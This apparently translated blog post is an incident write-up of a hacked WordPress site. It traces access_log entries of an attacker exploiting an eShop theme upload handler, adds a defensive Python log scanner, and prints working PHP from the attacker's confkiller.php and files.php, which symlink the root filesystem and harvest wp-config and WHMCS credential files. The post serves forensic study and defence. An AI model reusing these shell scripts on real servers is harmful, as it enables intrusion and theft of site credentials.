Track anonymous hacker (Hacked WordPress with eShop Plugin)
Following on from articles [1] and [2], Case Study: Web sites hacked, WordPress hacked, and tracing the hacker.
This time let's look at the details from the access_log file.
### –> START: ACCESS YOUR SITE ###
[sourcecode]
180.244.249.92 - - [28/May/2013:14:48:27 +0700] "GET /wp-content/plugins/sitepress-multilingual-cms/res/css/language-selector.css?v=2.0.4.1 HTTP/1.1" 200 5615
180.244.249.92 - - [28/May/2013:14:48:25 +0700] "GET /category/coffee/bean/ HTTP/1.1" 200 50899
180.244.249.92 - - [28/May/2013:14:48:27 +0700] "GET /wp-content/themes/อีช้อปปิ้ง/library/css/slider.css HTTP/1.1" 200 2474
180.244.249.92 - - [28/May/2013:14:48:27 +0700] "GET /wp-content/themes/อีช้อปปิ้ง/library/css/superfish.css HTTP/1.1" 200 3633
180.244.249.92 - - [28/May/2013:14:48:27 +0700] "GET /wp-content/themes/อีช้อปปิ้ง/library/css/thickbox.css HTTP/1.1" 200 4014
180.244.249.92 - - [28/May/2013:14:48:27 +0700] "GET /wp-content/themes/อีช้อปปิ้ง/style.css HTTP/1.1" 200 35201
[/sourcecode]
### –> START ATTACKING ###
The attacker opened the site path /wp-content/themes/อีช้อปปิ้ง/upload/upload.php, abusing the plugin's vulnerability, and then uploaded a script file (idca.php). This file is encoded with more than one encoding function.
The script is then invoked with the desired path appended (?y defaults to the path where the website's files are stored).
[sourcecode]
180.244.249.92 - - [28/May/2013:14:48:47 +0700] "POST /wp-content/themes/อีช้อปปิ้ง/upload/upload.php?img=&nonce= HTTP/1.1" 200 169
180.244.249.92 - - [28/May/2013:14:49:07 +0700] "GET /wp-content/uploads/products_img/idca.php HTTP/1.1" 200 4042
180.244.249.92 - - [28/May/2013:14:49:07 +0700] "GET /wp-content/uploads/products_img/idca.php?favicon HTTP/1.1" 303 -
180.244.249.92 - - [28/May/2013:14:49:08 +0700] "GET /wp-content/uploads/products_img/idca.php?favicon HTTP/1.1" 303 -
180.244.249.92 - - [28/May/2013:14:49:15 +0700] "POST /wp-content/uploads/products_img/idca.php HTTP/1.1" 200 1191961
180.244.249.92 - - [28/May/2013:14:49:21 +0700] "GET /wp-content/uploads/products_img/idca.php?y=/var/www/html/โดเมน-B/ HTTP/1.1" 200 19904
180.244.249.92 - - [28/May/2013:14:49:39 +0700] "GET /wp-content/uploads/products_img/idca.php?y=/var/www/html/โดเมน-B/ HTTP/1.1" 200 19904
[/sourcecode]
### –> [1] END ATTACKED SUCCESS ###
The hacker kept probing until able to call the upload function through the idca.php script, then uploaded further script files into the root directory of that domain.
[sourcecode]
180.244.249.92 - - [28/May/2013:14:49:41 +0700] "GET /wp-content/uploads/products_img/idca.php?y=/var/www/ HTTP/1.1" 200 27718
180.244.249.92 - - [28/May/2013:14:49:44 +0700] "GET /wp-content/uploads/products_img/idca.php?y=/var/www/html/ HTTP/1.1" 200 22856
180.244.249.92 - - [28/May/2013:14:49:51 +0700] "GET /wp-content/uploads/products_img/idca.php?y=/var/www/html/โดเมน-B-A/ HTTP/1.1" 200 20880
180.244.249.92 - - [28/May/2013:14:49:54 +0700] "GET /wp-content/uploads/products_img/idca.php?y=/var/www/html/ HTTP/1.1" 200 22856
180.244.249.92 - - [28/May/2013:14:49:59 +0700] "GET /wp-content/uploads/products_img/idca.php HTTP/1.1" 200 1191961
180.244.249.92 - - [28/May/2013:14:50:02 +0700] "GET /wp-content/uploads/products_img/idca.php?y=/var/www/html/โดเมน-B/httpd/html/ช้อป/ HTTP/1.1" 200 121198
180.244.249.92 - - [28/May/2013:14:50:05 +0700] "GET /wp-content/uploads/products_img/idca.php?y=/var/www/html/โดเมน-B/httpd/html/ช้อป/&x=upload HTTP/1.1" 200 13665
180.244.249.92 - - [28/May/2013:14:50:10 +0700] "POST /wp-content/uploads/products_img/idca.php?y=/var/www/html/โดเมน-B/httpd/html/ช้อป/&x=upload HTTP/1.1" 200 13730
180.244.249.92 - - [28/May/2013:14:50:54 +0700] "GET /wp-content/uploads/products_img/idca.php?y=/var/www/html/โดเมน-B/httpd/html/ช้อป/ HTTP/1.1" 200 124263
180.244.249.92 - - [28/May/2013:14:51:07 +0700] "POST /wp-content/uploads/products_img/idca.php?y=/var/www/html/โดเมน-B/httpd/html/ช้อป/ HTTP/1.1" 200 124383
180.244.249.92 - - [28/May/2013:14:51:12 +0700] "GET /wp-content/uploads/products_img/idca.php?y=/var/www/html/โดเมน-B/httpd/html/ช้อป/ HTTP/1.1" 200 124383
180.244.249.92 - - [28/May/2013:14:51:18 +0700] "GET /wp-content/uploads/products_img/idca.php?y=/var/www/html/โดเมน-B/httpd/html/ช้อป/&edit=/var/www/html/โดเมน-B/httpd/html/ช้อป/newfile.php HTTP/1.1" 200 12513
180.244.249.92 - - [28/May/2013:14:51:27 +0700] "POST /wp-content/uploads/products_img/idca.php?y=/var/www/html/โดเมน-B/httpd/html/ช้อป/&edit=/var/www/html/โดเมน-B/httpd/html/ช้อป/newfile.php HTTP/1.1" 200 46661
[/sourcecode]
### –> [2] END ATTACKED SUCCESS ###
It looks like a small team working together, also trying to break into the WordPress admin page.
[Indonesia and China]
[sourcecode]
180.244.249.92 - - [28/May/2013:14:53:12 +0700] "GET /files.php HTTP/1.1" 200 2832
142.4.101.26 - - [28/May/2013:14:53:12 +0700] "GET /wp-login.php HTTP/1.0" 200 2245
[/sourcecode]
The file files.php was uploaded successfully.
[sourcecode]
180.244.249.92 - - [28/May/2013:14:53:14 +0700] "GET /files.php?sws=sym HTTP/1.1" 200 2202
142.4.101.26 - - [28/May/2013:14:53:13 +0700] "POST /wp-login.php HTTP/1.0" 302 -
180.244.249.92 - - [28/May/2013:14:53:14 +0700] "GET /files.php?sws=read HTTP/1.1" 200 2600
[/sourcecode]
### –> [3] END ATTACKED SUCCESS ###
Another file was uploaded: confkiller.php.
[sourcecode]
180.244.249.92 - - [28/May/2013:14:53:21 +0700] "GET /wp-content/uploads/products_img/idca.php HTTP/1.1" 200 1191961
180.244.249.92 - - [28/May/2013:14:53:24 +0700] "GET /wp-content/uploads/products_img/idca.php?y=/var/www/html/โดเมน-B/httpd/html/ช้อป/ HTTP/1.1" 200 129458
180.244.249.92 - - [28/May/2013:14:53:26 +0700] "GET /wp-content/uploads/products_img/idca.php?y=/var/www/html/โดเมน-B/httpd/html/ช้อป/&x=upload HTTP/1.1" 200 13665
180.244.249.92 - - [28/May/2013:14:53:32 +0700] "POST /wp-content/uploads/products_img/idca.php?y=/var/www/html/โดเมน-B/httpd/html/ช้อป/&x=upload HTTP/1.1" 200 13734
180.244.249.92 - - [28/May/2013:14:53:42 +0700] "POST /confkiller.php HTTP/1.1" 200 5422 #<--Hacker: upload file name "files.php"
180.244.249.92 - - [28/May/2013:14:53:43 +0700] "POST /confkiller.php HTTP/1.1" 200 5243 #<--Hacker: upload file name "confkiller.php"
[/sourcecode]
### –> [4] END ATTACKED SUCCESS ###
The confkiller.php script was then executed from the web browser.
[sourcecode]
180.244.249.92 - - [28/May/2013:14:53:45 +0700] "GET /INDISHELL/ HTTP/1.1" 200 705
[/sourcecode]
[sourcecode]
180.244.249.92 - - [28/May/2013:14:54:09 +0700] "GET /files.php?sws=read HTTP/1.1" 200 2600
180.244.249.92 - - [28/May/2013:14:54:11 +0700] "GET /confkiller.php HTTP/1.1" 200 4842
180.244.249.92 - - [28/May/2013:14:54:12 +0700] "GET /wp-content/uploads/products_img/idca.php?y=/var/www/html/โดเมน-B/httpd/html/ช้อป/&x=upload HTTP/1.1" 200 13665
180.244.249.92 - - [28/May/2013:14:54:15 +0700] "GET /wp-content/uploads/products_img/idca.php?y=/var/www/html/โดเมน-B/httpd/html/ช้อป/ HTTP/1.1" 200 136865
180.244.249.92 - - [28/May/2013:14:54:20 +0700] "GET /wp-content/uploads/products_img/idca.php?y=/var/www/html/ HTTP/1.1" 200 22856
180.244.249.92 - - [28/May/2013:14:54:23 +0700] "GET /files.php?sws=read HTTP/1.1" 200 2600
180.244.249.92 - - [28/May/2013:14:54:25 +0700] "GET /files.php?sws=passwd HTTP/1.1" 200 5520
**************
180.244.249.92 - - [28/May/2013:14:54:26 +0700] "POST /files.php?sws=passwd&save=1 HTTP/1.1" 200 21005
**************
180.244.249.92 - - [28/May/2013:14:54:29 +0700] "GET /files.php?sws=sym HTTP/1.1" 200 2202
180.244.249.92 - - [28/May/2013:14:54:34 +0700] "GET /files.php?sws=read HTTP/1.1" 200 2600
180.244.249.92 - - [28/May/2013:14:54:36 +0700] "GET /files.php?sws=joomla HTTP/1.1" 200 2202
180.244.249.92 - - [28/May/2013:14:54:36 +0700] "GET /files.php?sws=read HTTP/1.1" 200 2600
180.244.249.92 - - [28/May/2013:14:54:37 +0700] "GET /files.php?sws=wp HTTP/1.1" 200 2202
180.244.249.92 - - [28/May/2013:14:54:37 +0700] "GET /files.php?sws=read HTTP/1.1" 200 2600
180.244.249.92 - - [28/May/2013:14:54:38 +0700] "GET /files.php?sws=vb HTTP/1.1" 200 2202
180.244.249.92 - - [28/May/2013:14:54:38 +0700] "GET /files.php?sws=read HTTP/1.1" 200 2600
180.244.249.92 - - [28/May/2013:14:54:41 +0700] "GET /files.php? HTTP/1.1" 200 2832
[/sourcecode]
And with that, the homepage was done for.
### –> [5] START: ATTACK UNSUCCESSFUL ###
They then kept trying to break into the remaining domains.
[sourcecode]
**************
180.244.249.92 - - [28/May/2013:14:54:48 +0700] "GET /wp-content/uploads/products_img/idca.php?y=/var/www/html/โดเมน-B-A/ HTTP/1.1" 200 20880
**************
180.244.249.92 - - [28/May/2013:14:54:52 +0700] "GET /wp-content/uploads/products_img/idca.php?y=/var/www/html/โดเมน-B-A/httpd/ HTTP/1.1" 200 30970
180.244.249.92 - - [28/May/2013:14:55:24 +0700] "GET /wp-content/uploads/products_img/idca.php?y=/var/www/html/โดเมน-B-A/httpd/html/ HTTP/1.1" 200 99678
180.244.249.92 - - [28/May/2013:14:55:52 +0700] "GET /wp-content/uploads/products_img/idca.php?y=/var/www/html/โดเมน-B-A/httpd/html/&x=upload HTTP/1.1" 200 14128
180.244.249.92 - - [28/May/2013:14:55:57 +0700] "POST /wp-content/uploads/products_img/idca.php?y=/var/www/html/โดเมน-B-A/httpd/html/&x=upload HTTP/1.1" 200 14155
180.244.249.92 - - [28/May/2013:14:56:04 +0700] "GET /wp-content/uploads/products_img/idca.php?y=/var/www/html/โดเมน-B-A/httpd/html/ HTTP/1.1" 200 99678
180.244.249.92 - - [28/May/2013:14:56:15 +0700] "POST /wp-content/uploads/products_img/idca.php?y=/var/www/html/โดเมน-B-A/httpd/html/ HTTP/1.1" 200 99678
180.244.249.92 - - [28/May/2013:14:56:51 +0700] "GET /wp-content/uploads/products_img/idca.php?y=/var/www/html/ HTTP/1.1" 200 22856
180.244.249.92 - - [28/May/2013:14:56:55 +0700] "GET /wp-content/uploads/products_img/idca.php?y=/var/www/html/โดเมน-C/ HTTP/1.1" 200 17516
180.244.249.92 - - [28/May/2013:14:57:16 +0700] "GET /wp-content/uploads/products_img/idca.php?y=/var/www/html/โดเมน-C/httpd/ HTTP/1.1" 200 28180
180.244.249.92 - - [28/May/2013:14:57:26 +0700] "GET /wp-content/uploads/products_img/idca.php?y=/var/www/html/โดเมน-C/httpd/html/ HTTP/1.1" 200 146442
180.244.249.92 - - [28/May/2013:14:57:31 +0700] "GET /wp-content/uploads/products_img/idca.php?y=/var/www/html/โดเมน-C/httpd/html/&x=upload HTTP/1.1" 200 13852
180.244.249.92 - - [28/May/2013:14:57:37 +0700] "POST /wp-content/uploads/products_img/idca.php?y=/var/www/html/โดเมน-C/httpd/html/&x=upload HTTP/1.1" 200 13879
180.244.249.92 - - [28/May/2013:14:57:45 +0700] "GET /wp-content/uploads/products_img/idca.php?y=/var/www/html/ HTTP/1.1" 200 22856
180.244.249.92 - - [28/May/2013:14:57:47 +0700] "GET /wp-content/uploads/products_img/idca.php?y=/var/www/html/โดเมน-D/ HTTP/1.1" 200 47166
[/sourcecode]
### –> END: ATTACK UNSUCCESSFUL ###
Unsuccessful; better go to sleep :-
Sample of the script file files.php
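As an added example (not from the original post), here is a small Python scanner that picks out of access_log the three patterns this timeline shows: a POST to an upload.php endpoint, a .php file served with 200 from under /wp-content/uploads/ (weighted higher when the same IP just POSTed to the upload endpoint), and an absolute filesystem path in a query string such as ?y=/var/www/html/. The sample lines are constructed from the post's log, with the Thai theme and domain names replaced by ASCII placeholders.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Apache common log format: ip - - [time] "METHOD path HTTP/x" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Constructed sample modelled on the post's access_log (theme and domain names replaced)
SAMPLE_LOG = """\
180.244.249.92 - - [28/May/2013:14:48:25 +0700] "GET /category/coffee/bean/ HTTP/1.1" 200 50899
180.244.249.92 - - [28/May/2013:14:48:47 +0700] "POST /wp-content/themes/eshop-theme/upload/upload.php?img=&nonce= HTTP/1.1" 200 169
180.244.249.92 - - [28/May/2013:14:49:07 +0700] "GET /wp-content/uploads/products_img/idca.php HTTP/1.1" 200 4042
180.244.249.92 - - [28/May/2013:14:49:21 +0700] "GET /wp-content/uploads/products_img/idca.php?y=/var/www/html/domain-b/ HTTP/1.1" 200 19904
142.4.101.26 - - [28/May/2013:14:53:13 +0700] "POST /wp-login.php HTTP/1.0" 302 -
"""

def parse_line(line):
    """Return the fields of one access_log line as a dict, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def find_indicators(log_text):
    """Return (rule, ip, path) tuples for every suspicious request, in log order."""
    hits = []
    upload_posters = set()  # IPs that have POSTed to an upload endpoint so far
    for raw in log_text.splitlines():
        rec = parse_line(raw)
        if not rec:
            continue
        url = urlsplit(rec["target"])
        path, query = url.path, parse_qs(url.query, keep_blank_values=True)
        ip = rec["ip"]
        # 1. write access through a theme/plugin upload handler
        if rec["method"] == "POST" and path.endswith("/upload.php"):
            upload_posters.add(ip)
            hits.append(("upload_endpoint_post", ip, path))
        # 2. PHP executing from the uploads tree (should never return 200 there)
        if path.startswith("/wp-content/uploads/") and path.endswith(".php") and rec["status"] == "200":
            rule = "php_in_uploads_after_upload" if ip in upload_posters else "php_in_uploads"
            hits.append((rule, ip, path))
        # 3. a server-side absolute path passed as a query value (directory browsing via a shell)
        if any(v.startswith("/") for vals in query.values() for v in vals):
            hits.append(("absolute_path_in_query", ip, path))
    return hits
```

Run against a real access_log, the IPs that appear in all three rules within a few minutes are the ones to pivot on, exactly as the post does with 180.244.249.92.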
[sourcecode]
@mkdir('sym',0777);
$htcs = "Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
$f =@fopen ('sym/.htaccess','w');
fwrite($f , $htcs);

@symlink("/","sym/root");

$pg = basename(__FILE__);

    ////////// WordPress ////////////

$pos = strpos($wp, "200");
$config="&nbsp;";

if (strpos($wp, "200") == true )
{
    $config="<a href='".$wpl."' target='_blank'>Wordpress</a>";
}
elseif (strpos($wp12, "200") == true)
{
    $config="<a href='".$wp2."' target='_blank'>Wordpress</a>";
}
[/sourcecode]
Sample of the script file confkiller.php
[sourcecode]
<?php
    error_reporting(0);
    echo "<font color=red size=2 face=\"comic sans ms\">";
    if(isset($_POST['su']))
    {
    mkdir('Indishell',0777);
$rr = " Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
$g = fopen('Indishell/.htaccess','w');
fwrite($g,$rr);
$indishell = symlink("/","Indishell/root");
    $rt="<a href=Indishell/root><font color=white size=3 face=\"comic sans ms\"> OwN3d</font></a>";
    echo "Bhai ji .... check link given below for / folder symlink <br><u>$rt</u>";

    $dir=mkdir('INDISHELL',0777);
    $r = " Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
    $f = fopen('INDISHELL/.htaccess','w');

    fwrite($f,$r);
    $consym="<a href=INDISHELL/><font color=white size=3 face=\"comic sans ms\">configuration files</font></a>";
    echo "<br>The link given below for configuration file symlink...open it, once processing finish <br><u><font color=red size=2 face=\"comic sans ms\">$consym</font></u>";

    $usr=explode("\n",$_POST['user']);
    $configuration=array("wp-config.php","wordpress/wp-config.php","configuration.php","blog/wp-config.php","joomla/configuration.php","vb/includes/config.php","includes/config.php","conf_global.php","inc/config.php","config.php","Settings.php","sites/default/settings.php","whm/configuration.php","whmcs/configuration.php","support/configuration.php","whmc/WHM/configuration.php","whm/WHMCS/configuration.php","whm/whmcs/configuration.php","support/configuration.php","clients/configuration.php","client/configuration.php","clientes/configuration.php","cliente/configuration.php","clientsupport/configuration.php","billing/configuration.php","admin/config.php");
    foreach($usr as $uss )
    {
    $us=trim($uss);

    foreach($configuration as $c)
    {
    $rs="/home/".$us."/public_html/".$c;
    $r="INDISHELL/".$us." .. ".$c;
    symlink($rs,$r);

    }

    }

    }

    ?>
[/sourcecode]
Sample of the script file idca.php (decoded by unphp.net)
[sourcecode]
<form method="post">

    <a href="?error"><img src="?favicon" style="margin:2px;vertical-align:middle;" /></a>

<span class="gaya">root@IDCA:~#</span><input id="login" class="inputz" type="password" name="pass" style="width:120px;" value="" />

    <input class="inputzbut" type="submit" value="Go !" name="submitlogin" style="width:80px;" />

    </form>

    </div>

</td></tr></table>

<form method=post>

<p class="footer">./Cyber404 | Mr-GanDrunX &copy;2013</p>

</form>
[/sourcecode]
In summary, the hacker tried to break into every domain on the web hosting server but only succeeded against the one running the eShop WordPress plugin, where they modified the homepage
and created a link exposing the system's directory listing. A preliminary check found no sign that sensitive data had leaked. The vulnerability lay in the eShop tool; the hacker did not use a WordPress vulnerability (though WordPress should still be updated to the latest version).
2 thoughts on “Track anonymous hacker (Hacked WordPress with eShop Plugin)”
Thank you so much for such detailed, useful knowledge. Plugins are scary.
The plugin just has a bug, that's all. There are plenty of good, useful plugins too.
10 good plugins for WordPress (WordPress SEO plugin to optimize your site)
//blog.susethailand.com/?p=2860